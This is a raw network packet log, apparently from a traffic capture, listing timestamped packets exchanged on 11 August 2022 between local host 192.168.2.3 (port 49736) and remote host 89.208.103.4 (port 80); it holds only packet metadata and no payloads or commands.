Aug 11, 2022 06:57:08.023371935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.023375988 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.023391962 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.023403883 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.023412943 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.023438931 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.023482084 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.039542913 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.039634943 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.039985895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.040047884 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.040102959 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.040066957 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.040121078 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.040152073 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.040155888 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.040200949 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.040213108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.040258884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.040270090 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.040317059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.040328026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.040374994 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.040381908 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.040436029 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.040438890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.040488005 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.040499926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.040548086 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.040555000 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.040606022 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.040608883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.040661097 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.040663004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.040714025 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.040719986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.040761948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.040766954 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.040796995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.040807962 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.040836096 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.040843964 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.040875912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.040883064 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.040925026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.040930986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.040980101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.040987968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041029930 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041037083 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041068077 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041075945 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041110992 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041116953 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041146994 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041157961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041186094 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041196108 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041224003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041233063 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041260004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041271925 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041297913 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041313887 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041335106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041344881 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041373014 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041383028 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041412115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041423082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041450024 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041460037 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041487932 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041500092 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041526079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041534901 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041563034 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041574001 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041600943 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041609049 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041637897 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041646004 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041676044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041685104 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041714907 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041723013 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041750908 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041762114 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041789055 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041799068 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041826010 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041836977 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041862965 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041872025 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041901112 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041908979 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041938066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041948080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.041975975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.041984081 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042015076 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042022943 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042051077 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042062044 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042088985 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042097092 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042125940 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042135954 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042162895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042172909 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042201042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042207956 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042237997 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042248964 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042275906 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042284966 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042315006 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042321920 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042351007 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042363882 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042388916 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042398930 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042427063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042435884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042469978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042479992 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042507887 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042520046 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042545080 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042558908 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042582035 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042593956 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042620897 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042630911 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042656898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042669058 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042694092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042704105 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042732000 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042742014 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042768002 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042779922 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042805910 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042814016 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042844057 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042851925 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042881966 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042891026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042922020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042929888 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.042958975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.042968988 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.043005943 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.058965921 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059026003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059067011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059103966 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059139967 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059165001 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059178114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059179068 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059182882 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059199095 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059216022 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059227943 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059253931 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059264898 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059293032 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059303999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059329987 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059343100 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059379101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059403896 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059447050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059458971 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059485912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059506893 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059523106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059539080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059562922 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059576988 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059601068 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059617043 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059638977 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059663057 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059678078 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059693098 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059714079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059746981 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059755087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059768915 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059792042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059807062 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059828043 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059845924 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059865952 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059884071 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059901953 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059914112 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059941053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059951067 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.059978962 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.059989929 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060014963 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060025930 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060053110 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060065985 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060091019 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060106039 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060127020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060138941 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060164928 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060175896 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060201883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060213089 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060240984 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060250044 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060280085 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060295105 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060314894 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060326099 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060353041 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060364962 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060390949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060401917 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060426950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060436964 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060467958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060478926 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060506105 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060514927 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060544968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060553074 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060583115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060592890 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060620070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060633898 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060657024 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060667038 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060694933 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060704947 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060730934 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060745001 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060769081 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060779095 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060806036 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060816050 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060843945 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060853958 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060883045 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060919046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060940027 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.060956955 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060992956 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.060993910 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.061000109 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.061019897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.061029911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.061043978 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.061069965 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.061106920 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.061108112 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.061145067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.061170101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.061177969 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.061184883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.061198950 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.061264992 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.061288118 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.061302900 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.061327934 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.061342955 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.061367989 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.061379910 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.061408043 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.061418056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.061443090 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.061459064 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.061485052 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.061496973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.061520100 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.061534882 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.061561108 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.061584949 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.324521065 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.349056005 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.378088951 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.378170013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.378230095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.378287077 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.378343105 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.378391981 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.378400087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.378421068 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.378427029 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.378432035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.378436089 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.378448009 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.378452063 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.378514051 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.391068935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.391092062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.391107082 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.391118050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.391305923 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.391738892 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.391772032 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.391784906 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.392052889 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.392123938 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.392160892 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.392219067 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.392230034 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.392287970 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.392314911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.392353058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.392380953 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.392393112 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.392431021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.392446995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.392452955 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.392466068 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.392482042 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.392507076 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.392530918 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.392544985 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.392564058 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.392584085 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.392596960 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.392632008 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.392672062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.392710924 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.392734051 CEST	49736	80	192.168.2.3	89.208.103.4
